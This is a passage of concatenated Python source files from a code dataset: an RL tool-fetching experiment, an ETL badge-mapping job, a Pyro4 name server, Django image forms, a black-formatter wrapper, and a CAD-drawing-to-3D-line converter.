in range(len(stations_pos))])\n fetcher_pos = np.array(random.choice(pos))\n worker_pos = np.array(random.choice(pos))\n goal = int(random.random()*len(stations_pos))\n env = ToolFetchingEnvironment(fetcher_pos, worker_pos, stations_pos, tools_pos, goal, width=args.grid_size, height=args.grid_size)\n path = rand_path_perm(stations_pos[goal], worker_pos)\n results['graph 1']['baseline'].append(-int(max(dist(worker_pos, stations_pos[goal]), dist(fetcher_pos, tools_pos[goal])+dist(tools_pos[goal], stations_pos[goal]))))\n for strat in strats:\n obs = env.reset()\n done = [False, False]\n fetcher = FetcherQueryPolicy(query_policy=strats[strat])\n worker = PlanPolicy(path + [ToolFetchingEnvironment.WORKER_ACTIONS.WORK])\n cost = 0\n time = 0\n rand_time = int(random.random()*args.grid_size)\n while not done[0]:\n if args.render:\n env.render()\n sleep(0.05)\n input()\n obs, reward, done, _ = env.step([worker(obs[0]), fetcher(obs[1])])\n cost += reward[1]\n time += 1\n results['graph 1'][strat].append(int(cost))\n env.close()\n return results\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-o', '--output', default='results.json', help='Output File')\n parser.add_argument('--render', action='store_true', help='Flag should be present if rendering is desired')\n parser.add_argument('--num_exp', default=100, type=int, help='Number of experiments to run')\n parser.add_argument('--grid_size', default=100, type=int, help='Grid Size of environment')\n parser.add_argument('--num_stations', default=400, type=int, help='Number of stations in environment')\n parser.add_argument('--cluster_stations', action='store_true', help='Flag should be present if stations are clustered')\n\n args = parser.parse_args()\n\n results = experiment(args)\n with open(args.output, 'w') as f:\n json.dump(results, f)\n\n\n","sub_path":"experiments/experiment3.py","file_name":"experiment3.py","file_ext":"py","file_size_in_byte":5421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"93341370","text":"import bonobo\nimport bonobo_sqlalchemy\nimport os\n\nfrom bonobo.config import use, use_context, use_raw_input, use_context_processor\n\nfrom bonobo.constants import NOT_MODIFIED\n\nfrom dateutil.relativedelta import relativedelta\n\nid_cache = {}\n\n\ndef _cache(self, context):\n yield id_cache\n\n\n@use_context_processor(_cache)\ndef cache(badge_id_cache, badge_id, empty1, last_name, empty2, first_name,\n *args):\n\n if last_name.lower() not in badge_id_cache:\n badge_id_cache[last_name.lower()] = dict()\n\n if first_name.lower() not in badge_id_cache[last_name.lower()]:\n badge_id_cache[last_name.lower()][first_name.lower()] = set()\n\n badge_id_cache[last_name.lower()][first_name.lower()].add(badge_id)\n\n return NOT_MODIFIED\n\n\ndef badge_active(badge_id, empty1, last_name, empty2, first_name, empty3,\n issued_on, empty4, disabled, *args):\n\n if disabled == 'True':\n return\n\n return NOT_MODIFIED\n\n\ndef get_cache_graph(**options):\n \"\"\"\n\n This graphs builds a cache of badges from ccure\n \n :return: bonobo.Graph\n\n \"\"\"\n\n graph = bonobo.Graph()\n\n graph.add_chain(\n bonobo.CsvReader(\n '/etl/ccure/uploads/BadgeID/ccure_BadgeID_AllButVendor.txt',\n fields=('badge_id', 'empty1', 'last_name', 'empty2', 'first_name',\n 'empty3', 'issued_on', 'empty4', 'disabled', 'empty5',\n 'valid_until', 'empty6', 'flag2', 'empty7', 'flag3',\n 'empty8', 'flag4'),\n delimiter='|',\n fs='brickftp'),\n badge_active,\n cache,\n )\n\n return graph\n\n\ndef get_graph(**options):\n \"\"\"\n This function builds the graph that needs to be executed.\n\n :return: bonobo.Graph\n\n \"\"\"\n\n graph = bonobo.Graph()\n\n split_dbs = bonobo.noop\n\n graph.add_chain(\n bonobo.CsvReader(\n '/etl/metrics-insights/workday-users.csv', fs='brickftp'),\n employee_active, find_badge_id, bonobo.UnpackItems(0), split_dbs)\n\n for engine in list(set(options['engine'])):\n graph.add_chain(\n bonobo_sqlalchemy.InsertOrUpdate(\n table_name=options['table_name'] + options['table_suffix'],\n discriminant=('badgeid', ),\n buffer_size=10,\n engine=engine),\n _input=split_dbs)\n\n return graph\n\n\ndef employee_active(employee_id=None,\n Last_Name=None,\n First_Name=None,\n Preffered_Last_Name=None,\n Preferred_First_Name=None,\n Hire_Date=None,\n Email=None,\n Cost_Center_Name=None,\n Cost_Center_Number=None,\n Cost_Center_Hierarchy=None,\n Employee_Type=None,\n Employee_Status=None,\n Business_Title=None,\n Work_Location=None,\n Manager=None,\n Supervisory_Organization=None,\n manager_level_02=None,\n Manager_s_Manager_Supervisory_Organization=None,\n manager_level_03=None,\n manager_level_04=None,\n manager_level_05=None,\n termination_date=None):\n \"\"\"Filter out employees that are NOT active\"\"\"\n\n if Employee_Status == 'Active':\n return NOT_MODIFIED\n\n\n@use_context_processor(_cache)\ndef find_badge_id(badge_id_cache,\n employee_id=None,\n Last_Name=None,\n First_Name=None,\n Preffered_Last_Name=None,\n Preferred_First_Name=None,\n Hire_Date=None,\n Email=None,\n Cost_Center_Name=None,\n Cost_Center_Number=None,\n Cost_Center_Hierarchy=None,\n Employee_Type=None,\n Employee_Status=None,\n Business_Title=None,\n Work_Location=None,\n Manager=None,\n Supervisory_Organization=None,\n manager_level_02=None,\n Manager_s_Manager_Supervisory_Organization=None,\n manager_level_03=None,\n manager_level_04=None,\n manager_level_05=None,\n termination_date=None):\n\n plname = badge_id_cache.get(Preffered_Last_Name.lower(), {})\n lname = badge_id_cache.get(Last_Name.lower(), {})\n\n lname.update(plname)\n\n pfname = lname.get(Preferred_First_Name.lower(), set())\n fname = lname.get(First_Name.lower(), set())\n\n fname.update(pfname)\n\n for badge_id in fname:\n yield {\n 'employee_id': employee_id,\n 'first_name': First_Name.title(),\n 'last_name': Last_Name.title(),\n 'badgeid': badge_id,\n 'email': Email,\n }\n\n\nimport json\n\n\ndef get_services(**options):\n \"\"\"\n This function builds the services dictionary, which is a simple dict of names-to-implementation used by bonobo\n for runtime injection.\n\n It will be used on top of the defaults provided by bonobo (fs, http, ...). You can override those defaults, or just\n let the framework define them. You can also define your own services and naming is up to you.\n\n :return: dict\n \"\"\"\n\n return {}\n\n\n# The __main__ block actually execute the graph.\nif __name__ == '__main__':\n if not __package__:\n from os import sys, path\n top = path.dirname(\n path.dirname(path.dirname(path.dirname(path.abspath(__file__)))))\n sys.path.append(top)\n\n me = []\n me.append(path.split(path.dirname(path.abspath(__file__)))[1])\n me.insert(\n 0,\n path.split(path.dirname(path.dirname(path.abspath(__file__))))[1])\n me.insert(\n 0,\n path.split(\n path.dirname(\n path.dirname(path.dirname(path.abspath(__file__)))))[1])\n\n __package__ = '.'.join(me)\n\n from ... import add_default_arguments, add_default_services\n\n parser = bonobo.get_argument_parser()\n\n add_default_arguments(parser)\n\n parser.add_argument(\n '--table-name',\n type=str,\n default=os.getenv('BOOMI_TABLE', 'f_employee'))\n\n with bonobo.parse_args(parser) as options:\n services = get_services(**options)\n add_default_services(services, options)\n\n g1 = get_cache_graph(**options)\n print(\"# Running card_id cache\")\n bonobo.run(g1, services=services)\n\n g2 = get_graph(**options)\n print(\"# Runing employee mapping\")\n bonobo.run(g2, services=services)\n","sub_path":"mozilla_etl/boomi/ccure/email/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"602303990","text":"\"\"\"\nImplementation of name server.\n\"\"\"\nimport os\nimport time\nimport random\nimport multiprocessing\n\nimport Pyro4\nfrom Pyro4.errors import NamingError\nfrom Pyro4.naming import BroadcastServer\n\nfrom .common import format_exception\nfrom .common import address_to_host_port\nfrom .address import AgentAddress\nfrom .address import SocketAddress\nfrom .proxy import Proxy\nfrom .proxy import NSProxy\n\n\n@Pyro4.expose\nclass NameServer(Pyro4.naming.NameServer):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.shutdown_parent_daemon = False\n\n def ping(self):\n \"\"\"\n A simple test method to check if the name server is running correctly.\n \"\"\"\n return 'pong'\n\n def agents(self):\n \"\"\"\n List agents registered in the name server.\n \"\"\"\n agents = self.list()\n return [name for name in agents if name != 'Pyro.NameServer']\n\n def async_shutdown_agents(self):\n \"\"\"\n Shutdown all agents registered in the name server.\n \"\"\"\n for name, address in self.list().items():\n if name == 'Pyro.NameServer':\n continue\n agent = Pyro4.core.Proxy(address)\n agent.shutdown()\n\n def async_shutdown(self):\n \"\"\"\n Shutdown the name server. All agents will be shutdown as well.\n \"\"\"\n self.async_shutdown_agents()\n self.shutdown_parent_daemon = True\n\n\nPyro4.naming.NameServer = NameServer\n\n\nclass NameServerProcess(multiprocessing.Process):\n \"\"\"\n Name server class. Instances of a name server are system processes which\n can be run independently.\n \"\"\"\n def __init__(self, addr=None):\n super().__init__()\n if isinstance(addr, int):\n addr = '127.0.0.1:%s' % addr\n self.addr = addr\n self.host, self.port = address_to_host_port(addr)\n self.shutdown_event = multiprocessing.Event()\n self.uri = None\n self.queue = multiprocessing.Queue()\n\n def run(self):\n # Capture SIGINT\n\n try:\n self.daemon = Pyro4.naming.NameServerDaemon(self.host, self.port)\n except Exception:\n self.queue.put(format_exception())\n return\n self.queue.put('STARTED')\n self.uri = self.daemon.uriFor(self.daemon.nameserver)\n self.host = self.uri.host\n self.port = self.uri.port\n self.addr = AgentAddress(self.host, self.port)\n internal_uri = self.daemon.uriFor(self.daemon.nameserver, nat=False)\n enable_broadcast = True\n bcserver = None\n hostip = self.daemon.sock.getsockname()[0]\n if hostip.startswith(\"127.\"):\n print(\"Not starting broadcast server for localhost.\")\n enable_broadcast = False\n if enable_broadcast:\n # Make sure to pass the internal uri to the broadcast\n # responder. It is almost always useless to let it return\n # the external uri, because external systems won't be able\n # to talk to this thing anyway.\n bcserver = BroadcastServer(internal_uri)\n print(\"Broadcast server running on %s\" % bcserver.locationStr)\n bcserver.runInThread()\n print(\"NS running on %s (%s)\" % (self.daemon.locationStr, hostip))\n print(\"URI = %s\" % self.uri)\n try:\n self.daemon.requestLoop(\n lambda: (not self.shutdown_event.is_set() and\n not self.daemon.nameserver.shutdown_parent_daemon)\n )\n finally:\n self.daemon.close()\n if bcserver is not None:\n bcserver.close()\n print(\"NS shut down.\")\n\n def start(self):\n os.environ['OSBRAIN_NAMESERVER_ADDRESS'] = str(self.addr)\n super().start()\n status = self.queue.get()\n if status == 'STARTED':\n return\n raise RuntimeError('An error occured while creating the daemon!' +\n '\\n===============\\n'.join(['', status, '']))\n\n def agents(self):\n \"\"\"\n List agents registered in the name server.\n \"\"\"\n proxy = NSProxy(self.addr)\n agents = proxy.list()\n proxy.release()\n return [name for name in agents if name != 'Pyro.NameServer']\n\n def shutdown_all(self):\n \"\"\"\n Shutdown all agents registered in the name server.\n \"\"\"\n for agent in self.agents():\n agent = Proxy(agent, self.addr)\n agent.shutdown()\n\n def shutdown(self):\n \"\"\"\n Shutdown the name server. All agents will be shutdown as well.\n \"\"\"\n self.shutdown_all()\n nameserver = NSProxy(self.addr)\n # Wait for all agents to be shutdown (unregistered)\n while len(nameserver.list()) > 1:\n time.sleep(0.1)\n self.shutdown_event.set()\n self.terminate()\n self.join()\n\n\ndef random_nameserver():\n \"\"\"\n Start a random name server.\n\n Returns\n -------\n SocketAddress\n The name server address.\n \"\"\"\n while True:\n try:\n # Bind to random port\n host = '127.0.0.1'\n port = random.randrange(10000, 20000)\n addr = SocketAddress(host, port)\n nameserver = NameServerProcess(addr)\n nameserver.start()\n return addr\n except NamingError:\n continue\n except PermissionError:\n continue\n except:\n raise\n\n\ndef run_nameserver(addr=None):\n \"\"\"\n Ease the name server creation process.\n\n This function will create a new nameserver, start the process and then run\n its main loop through a proxy.\n\n Parameters\n ----------\n addr : SocketAddress, default is None\n Name server address.\n\n Returns\n -------\n proxy\n A proxy to the name server.\n \"\"\"\n if not addr:\n addr = random_nameserver()\n else:\n NameServerProcess(addr).start()\n return NSProxy(addr)\n","sub_path":"osbrain/nameserver.py","file_name":"nameserver.py","file_ext":"py","file_size_in_byte":5982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"477376073","text":"\"\"\"\n* Purpose: Forms\n\n* @author: Nikhil Lad\n* @version: 3.7\n* @since: 01-2-2019\n\n\"\"\"\nfrom django.contrib import messages\nfrom django.contrib.auth import get_user_model\nfrom django.shortcuts import redirect\nfrom image import settings\nfrom requests import request\nfrom django.contrib.auth.forms import UserCreationForm,AuthenticationForm\nfrom PIL import Image\nfrom django import forms\nfrom .models import Photo\nfrom .cloud_services import s3_services\n\nUser= get_user_model()\n\nclass LoginForm(forms.ModelForm):\n model=User\n class Meta:\n fields=['username','password',]\n\n\n\nclass SignupForm(UserCreationForm): # inheriting user-creation form to create form with following fields\n\n email=forms.RegexField(regex=r'^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$',required=True)\n class Meta:\n model = User\n fields = ('username', 'email', 'password1', 'password2')\n\n def save(self, commit=True):\n user = super(SignupForm, self).save(commit=False)\n user.email = self.cleaned_data[\"email\"]\n if commit:\n user.save()\n return user\n\nclass loginForm(AuthenticationForm): # inheriting user-creation form to create form with following fields\n class Meta:\n model = User\n fields = ('username','password')\n\n def save(self, commit=True):\n user = super(loginForm, self).save(commit=False)\n\n if commit:\n user.save()\n return user\n\nclass ImageUploadForm(forms.Form):\n image = forms.ImageField(label='Select a file')\n\n\n\n\n\n\nclass PhotoForm(forms.ModelForm):\n username = forms.CharField(required=True,label='Username',widget=forms.TextInput(attrs={'placeholder': 'Username '}))\n x = forms.FloatField(widget=forms.HiddenInput())\n y = forms.FloatField(widget=forms.HiddenInput())\n width = forms.FloatField(widget=forms.HiddenInput())\n height = forms.FloatField(widget=forms.HiddenInput())\n\n class Meta:\n model = Photo\n fields = ('file', 'x', 'y', 'width', 'height', )\n\n\n \"\"\" X coordinate, Y coordinate, height and width of the cropping box \"\"\"\n\n def save(self):\n username = self.cleaned_data.get('username') # username to save image for particular user.\n\n photo = super(PhotoForm, self).save()\n\n x = self.cleaned_data.get('x') # X coordinate\n y = self.cleaned_data.get('y') # X coordinate\n w = self.cleaned_data.get('width') # width of cropping box\n h = self.cleaned_data.get('height') # height of cropping box\n\n\n image = Image.open(photo.file).convert('RGB') # opens image file using Pillow library\n\n cropped_image = image.crop((x, y, w+x, h+y)) # crops image with x,y,w,h\n resized_image = cropped_image.resize((200, 200), Image.ANTIALIAS) # resize cropped image.\n resized_image.save(photo.file.path)\n path=photo.file.path # gets the image path.\n s3_services.upload_image(request, path, username) # calls method to upload pic to S3.\n\n\n return photo\n\n def clean_photo(self):\n\n try:\n image_file = super(PhotoForm, self)\n if not image_file.name.endswith(\".png\",\".jpeg\",\".jpg\"):\n\n messages.error(request, 'Please select valid file')\n return redirect('photo_list')\n return image_file\n\n except Exception as e:\n print(e)\n","sub_path":"restapi_demo/apidemo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"332328871","text":"import itertools\nimport sys\nimport tempfile\nimport tokenize\n\nimport black\n\n\n__version__ = \"1.2.0\"\n\n\ndef macchiato(in_fp, out_fp, args=None):\n if args is None:\n args = []\n\n # Read input.\n lines = in_fp.readlines()\n\n # Detect blank lines and deal with completely blank input.\n n_blank_before, n_blank_after = count_surrounding_blank_lines(lines)\n until = len(lines) - n_blank_after\n lines = lines[n_blank_before:until]\n if not lines:\n out_fp.write(\"\\n\" * n_blank_before)\n return 0\n\n # Detect indentation. Add \"if True:\" lines if needed for valid syntax.\n first_line = lines[0]\n indent = len(first_line) - len(first_line.lstrip())\n n_fake_before, remainder = divmod(indent, 4)\n if remainder:\n raise ValueError(\"indent of first line must be a multiple of four\")\n for i in range(n_fake_before):\n prefix = 4 * i * \" \"\n lines.insert(i, f\"{prefix}if True:\\n\")\n\n # Handle else/elif/except/finally\n try:\n first_token = next(\n tokenize.generate_tokens(iter([first_line.lstrip()]).__next__)\n )\n except tokenize.TokenError:\n first_token = None\n if first_token and first_token.type == tokenize.NAME:\n name = first_token.string\n if name in {\"else\", \"elif\"}:\n lines.insert(n_fake_before, f\"{indent * ' '}if True:\\n\")\n lines.insert(n_fake_before + 1, f\"{indent * ' '} pass\\n\")\n n_fake_before += 2\n elif name in {\"except\", \"finally\"}:\n lines.insert(n_fake_before, f\"{indent * ' '}try:\\n\")\n lines.insert(n_fake_before + 1, f\"{indent * ' '} pass\\n\")\n n_fake_before += 2\n\n # Detect an unclosed block at the end. Add ‘pass’ at the end of the line if\n # needed for valid syntax.\n last_line = lines[-1]\n n_fake_after = 0\n if last_line.rstrip().endswith(\":\"):\n lines[-1] = last_line.rstrip() + \"pass\\n\"\n n_fake_after = 1\n\n with tempfile.NamedTemporaryFile(suffix=\".py\", mode=\"wt+\", delete=False) as fp:\n\n # Copy the input.\n for line in lines:\n fp.write(line)\n\n fp.flush()\n\n # Run black.\n if \"--quiet\" not in args:\n args.append(\"--quiet\")\n args.append(fp.name)\n try:\n exit_code = black.main(args=args)\n except SystemExit as exc:\n exit_code = exc.code\n\n if exit_code == 0:\n # Write output.\n fp.seek(0)\n formatted_lines = fp.readlines()\n until = len(formatted_lines) - n_fake_after\n formatted_lines = formatted_lines[n_fake_before:until]\n fmt_n_blank_before, _ = count_surrounding_blank_lines(formatted_lines)\n formatted_lines = formatted_lines[fmt_n_blank_before:]\n out_fp.write(\"\\n\" * n_blank_before)\n for line in formatted_lines:\n out_fp.write(line)\n out_fp.write(\"\\n\" * n_blank_after)\n\n return exit_code\n\n\ndef is_blank_string(s):\n return s.isspace() or not s\n\n\ndef count_surrounding_blank_lines(lines):\n before = 0\n after = 0\n grouper = itertools.groupby(lines, is_blank_string)\n try:\n is_blank, group = next(grouper)\n except StopIteration:\n pass\n else:\n if is_blank:\n before = len(list(group))\n\n for is_blank, group in grouper:\n after = len(list(group)) if is_blank else 0\n\n return before, after\n\n\ndef main():\n try:\n args = sys.argv[1:]\n exit_code = macchiato(sys.stdin, sys.stdout, args)\n except ValueError as exc:\n raise SystemExit(str(exc))\n else:\n raise SystemExit(exit_code)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"macchiato.py","file_name":"macchiato.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"152165005","text":"import pandas as pd\r\nfrom math import trunc\r\nimport csv\r\n\r\n\r\ndef extract(exel): # 엑셀로부터 선분 리스트 생성\r\n list_polyline = exel[exel['Name'] == 'Line']\r\n list_a_x = list_polyline['Start X'].tolist()\r\n list_a_y = list_polyline['Start Y'].tolist()\r\n for x in range(0, len(list_a_x)):\r\n list_a_x[x] = trunc(list_a_x[x])\r\n for x in range(0, len(list_a_y)):\r\n list_a_y[x] = trunc(list_a_y[x])\r\n list_b_x = list_polyline['Delta X'].tolist()\r\n list_b_y = list_polyline['Delta Y'].tolist()\r\n for x in range(0, len(list_b_x)):\r\n list_b_x[x] = list_a_x[x] + list_b_x[x]\r\n for x in range(0, len(list_a_y)):\r\n list_b_y[x] = list_a_y[x] + list_b_y[x]\r\n list_line = []\r\n for x in range(0, len(list_a_x)):\r\n list_line.append(((list_a_x[x], list_a_y[x], 0), (list_b_x[x], list_b_y[x], 0)))\r\n return list_line\r\n\r\n\r\ndef extract_point(list_line): # 선분 리스트로부터 점 리스트 생성\r\n list_point = []\r\n for x in range(0, len(list_line)):\r\n list_point.append(list_line[x][0])\r\n list_point.append(list_line[x][1])\r\n return list_point\r\n\r\n\r\ndef min_xy(list_point): # 최소 좌표 탐색\r\n min_x = list_point[0][0]\r\n min_y = list_point[0][1]\r\n for x in range(1, len(list_point)):\r\n if list_point[x][0] < min_x:\r\n min_x = list_point[x][0]\r\n if list_point[x][1] < min_y:\r\n min_y = list_point[x][1]\r\n return min_x, min_y\r\n\r\n\r\ndef min_xy_symmetry_x_axis(list_point): # x축 대칭방향 최소 좌표 탐색\r\n min_x = list_point[0][0]\r\n min_y = list_point[0][1]\r\n for x in range(1, len(list_point)):\r\n if list_point[x][0] > min_x:\r\n min_x = list_point[x][0]\r\n if list_point[x][1] < min_y:\r\n min_y = list_point[x][1]\r\n return min_x, min_y\r\n\r\n\r\ndef max_xyz(front, rear, right, left, roof, floor):\r\n max_x = front[0][0]\r\n max_y = front[0][1]\r\n max_z = front[0][2]\r\n for x in range(1, len(front)):\r\n if front[x][0] > max_x:\r\n max_x = front[x][0]\r\n print(\"front[{}][0]={}\".format(x, front[x][0]))\r\n print(max_x)\r\n if front[x][2] > max_z:\r\n max_z = front[x][2]\r\n print(\"front[{}][2]={}\".format(x, front[x][2]))\r\n print(max_z)\r\n\r\n for x in range(0, len(rear)):\r\n if rear[x][0] > max_x:\r\n max_x = rear[x][0]\r\n print(\"rear[{}][0]={}\".format(x, rear[x][0]))\r\n print(max_x)\r\n if rear[x][2] > max_z:\r\n max_z = rear[x][2]\r\n print(\"rear[{}][2]={}\".format(x, rear[x][2]))\r\n print(max_z)\r\n\r\n for x in range(0, len(right)):\r\n if right[x][0] > max_x:\r\n max_y = right[x][1]\r\n print(\"right[{}][1]={}\".format(x, right[x][1]))\r\n print(max_y)\r\n if right[x][2] > max_z:\r\n max_z = right[x][2]\r\n print(\"right[{}][2]={}\".format(x, right[x][2]))\r\n print(max_z)\r\n\r\n for x in range(0, len(left)):\r\n if left[x][1] > max_y:\r\n max_y = left[x][1]\r\n print(\"left[{}][1]={}\".format(x, left[x][1]))\r\n print(max_y)\r\n if left[x][2] > max_z:\r\n max_z = left[x][2]\r\n print(\"left[{}][2]={}\".format(x, left[x][1]))\r\n print(max_z)\r\n\r\n for x in range(0, len(roof)):\r\n if roof[x][0] > max_x:\r\n max_x = roof[x][0]\r\n print(\"roof[{}][0]={}\".format(x, roof[x][0]))\r\n print(max_x)\r\n if roof[x][1] > max_y:\r\n max_y = roof[x][1]\r\n print(\"roof[{}][1]={}\".format(x, roof[x][1]))\r\n print(max_y)\r\n\r\n for x in range(0, len(floor)):\r\n if floor[x][0] > max_x:\r\n max_x = floor[x][0]\r\n print(\"floor[{}][0]={}\".format(x, floor[x][0]))\r\n print(max_x)\r\n if floor[x][1] > max_y:\r\n max_y = floor[x][1]\r\n print(\"floor[{}][1]={}\".format(x, floor[x][1]))\r\n print(max_y)\r\n\r\n print(\"max_x = {}, max_y={}, max_z={}\".format(max_x, max_y, max_z))\r\n return max_x, max_y, max_z\r\n\r\n\r\ndef normalize(list_line, min_x, min_y): # 표준화\r\n for x in range(0, len(list_line)):\r\n list_line[x] = ((int(list_line[x][0][0]) - int(min_x), int(list_line[x][0][1]) - int(min_y), 0),\r\n (int(list_line[x][1][0]) - int(min_x), int(list_line[x][1][1]) - int(min_y), 0))\r\n return list_line\r\n\r\n\r\ndef normalize_symmetry_x_axis(list_line, min_x, min_y): # x축 대칭 방향 표준화\r\n for x in range(0, len(list_line)):\r\n list_line[x] = ((int(min_x) - int(list_line[x][0][0]), int(list_line[x][0][1]) - int(min_y), 0),\r\n (int(min_x) - int(list_line[x][1][0]), int(list_line[x][1][1]) - int(min_y), 0))\r\n return list_line\r\n\r\n\r\ndef xyz_front_view(list_line): # 정면도 배치\r\n for x in range(0, len(list_line)):\r\n list_line[x] = ((list_line[x][0][0], 0, list_line[x][0][1]), (list_line[x][1][0], 0, list_line[x][1][1]))\r\n return list_line\r\n\r\n\r\ndef xyz_rear_view(list_line): # 배면도 배치\r\n for x in range(0, len(list_line)):\r\n list_line[x] = (\r\n (list_line[x][0][0], 0, list_line[x][0][1]), (list_line[x][1][0], 0, list_line[x][1][1]))\r\n return list_line\r\n\r\n\r\ndef xyz_right_side_view(list_line): # 우측면도 배치\r\n for x in range(0, len(list_line)):\r\n list_line[x] = (\r\n (0, list_line[x][0][0], list_line[x][0][1]), (0, list_line[x][1][0], list_line[x][1][1]))\r\n return list_line\r\n\r\n\r\ndef xyz_left_side_view(list_line): # 좌측면도 배치\r\n for x in range(0, len(list_line)):\r\n list_line[x] = ((0, list_line[x][0][0], list_line[x][0][1]), (0, list_line[x][1][0], list_line[x][1][1]))\r\n return list_line\r\n\r\n\r\ndef xyz_roof_floor_view(list_line): # 지붕도면 배치\r\n for x in range(0, len(list_line)):\r\n list_line[x] = (\r\n (list_line[x][0][0], list_line[x][0][1], 0), (list_line[x][1][0], list_line[x][1][1], 0))\r\n return list_line\r\n\r\n\r\ndef xyz_right_side_view_shift(list_line, max_x):\r\n for x in range(0, len(list_line)):\r\n list_line[x] = (\r\n (max_x, list_line[x][0][1], list_line[x][0][2]), (max_x, list_line[x][1][1], list_line[x][1][2]))\r\n return list_line\r\n\r\n\r\ndef xyz_rear_view_shift(list_line, max_y):\r\n for x in range(0, len(list_line)):\r\n list_line[x] = (\r\n (list_line[x][0][0], max_y, list_line[x][0][2]), (list_line[x][1][0], max_y, list_line[x][1][2]))\r\n return list_line\r\n\r\n\r\ndef xyz_roof_floor_view_shift(list_line, max_z):\r\n for x in range(0, len(list_line)):\r\n list_line[x] = (\r\n (list_line[x][0][0], list_line[x][0][1], max_z), (list_line[x][1][0], list_line[x][1][1], max_z))\r\n return list_line\r\n\r\n\r\nfront_view_view_xls = pd.read_excel(\"front_view.xls\") # 각 도면의 엑셀 파일 읽어오기\r\nrear_view_view_xls = pd.read_excel(\"rear_view.xls\")\r\nright_side_view_xls = pd.read_excel(\"right_side_view.xls\")\r\nleft_side_view_xls = pd.read_excel(\"left_side_view.xls\")\r\nfloor_view_xls = pd.read_excel(\"floor_view.xls\")\r\nroof_floor_view_xls = pd.read_excel(\"roof_floor_view.xls\")\r\n\r\nfront_view_line = extract(front_view_view_xls) # 각 도면의 엑셀 파일로부터 선분 리스트 생성\r\nrear_view_line = extract(rear_view_view_xls)\r\nright_side_view_line = extract(right_side_view_xls)\r\nleft_side_view_line = extract(left_side_view_xls)\r\nfloor_view_line = extract(floor_view_xls)\r\nroof_floor_view_line = extract(roof_floor_view_xls)\r\n\r\nfront_view_points = extract_point(front_view_line) # 각 도면의 선분 리스트로부터 모든 점의 리스트 생성\r\nrear_view_points = extract_point(rear_view_line)\r\nright_side_points = extract_point(right_side_view_line)\r\nleft_side_points = extract_point(left_side_view_line)\r\nfloor_points = extract_point(floor_view_line)\r\nroof_floor_points = extract_point(roof_floor_view_line)\r\n\r\nprint(\"size={}\\n front point = {}\".format(len(front_view_points), front_view_points))\r\nprint(\"rear point = {}\".format(rear_view_points))\r\nprint(\"right point = {}\".format(right_side_points))\r\nprint(\"left point = {}\".format(left_side_points))\r\nprint(\"roof point = {}\".format(roof_floor_points))\r\nprint(\"floor point = {}\".format(floor_points))\r\n\r\nfront_view_min_x, front_view_min_y = min_xy(front_view_points) # x좌표와 y좌표 최소값 탐색\r\nrear_view_min_x, rear_view_min_y = min_xy_symmetry_x_axis(rear_view_points)\r\nright_side_min_x, right_side_min_y = min_xy(right_side_points)\r\nleft_side_min_x, left_side_min_y = min_xy_symmetry_x_axis(left_side_points)\r\nfloor_min_x, floor_min_y = min_xy(floor_points)\r\nroof_floor_min_x, roof_floor_min_y = min_xy(roof_floor_points)\r\n\r\nfront_view_line = normalize(front_view_line, front_view_min_x, front_view_min_y) # 최소 x, y값을 기준으로 좌표 변환\r\nrear_view_line = normalize_symmetry_x_axis(rear_view_line, rear_view_min_x, rear_view_min_y)\r\nright_side_view_line = normalize(right_side_view_line, right_side_min_x, right_side_min_y)\r\nleft_side_view_line = normalize_symmetry_x_axis(left_side_view_line, left_side_min_x, left_side_min_y)\r\nfloor_view_line = normalize(floor_view_line, floor_min_x, floor_min_y)\r\nroof_floor_view_line = normalize(roof_floor_view_line, roof_floor_min_x, roof_floor_min_y)\r\n\r\nprint(\"size={}\\n front point = {}\".format(len(front_view_points), front_view_points))\r\nprint(\"rear point = {}\".format(rear_view_points))\r\nprint(\"right point = {}\".format(right_side_points))\r\nprint(\"left point = {}\".format(left_side_points))\r\nprint(\"roof point = {}\".format(roof_floor_points))\r\nprint(\"floor point = {}\".format(floor_points))\r\n\r\nfront_view_line = xyz_front_view(front_view_line) # 3차원 공간좌표로 변환\r\nrear_view_line = xyz_rear_view(rear_view_line)\r\nright_side_view_line = xyz_right_side_view(right_side_view_line)\r\nleft_side_view_line = xyz_left_side_view(left_side_view_line)\r\nroof_floor_view_line = xyz_roof_floor_view(roof_floor_view_line)\r\n\r\nfront_view_points = extract_point(front_view_line) # 변환된 각 도면의 선분 리스트로부터 모든 점의 리스트 재생성\r\nrear_view_points = extract_point(rear_view_line)\r\nright_side_points = extract_point(right_side_view_line)\r\nleft_side_points = extract_point(left_side_view_line)\r\nfloor_points = extract_point(floor_view_line)\r\nroof_floor_points = extract_point(roof_floor_view_line)\r\n\r\nmax_x, max_y, max_z = max_xyz( # 변환한 공간 좌표 중 x, y, z 최대값 ��색\r\n front_view_points,\r\n rear_view_points,\r\n right_side_points,\r\n left_side_points,\r\n roof_floor_points,\r\n floor_points)\r\n\r\nrear_view_line = xyz_rear_view_shift(rear_view_line, max_y) # 탐색한 최대값을 이용하여 배면도, 우측면도, 지붕도면 평행 이동\r\nright_side_view_line = xyz_right_side_view_shift(right_side_view_line, max_x)\r\nroof_floor_view_line = xyz_roof_floor_view_shift(roof_floor_view_line, max_z)\r\n\r\nprint(\"front\")\r\nfor x in front_view_line:\r\n print(\"{} to {}\".format(x[0], x[1]))\r\nprint(\"rear\")\r\nfor x in rear_view_line:\r\n print(\"{} to {}\".format(x[0], x[1]))\r\nprint(\"right side\")\r\nfor x in right_side_view_line:\r\n print(\"{} to {}\".format(x[0], x[1]))\r\nprint(\"left side\")\r\nfor x in left_side_view_line:\r\n print(\"{} to {}\".format(x[0], x[1]))\r\nprint(\"roof floor\")\r\nfor x in 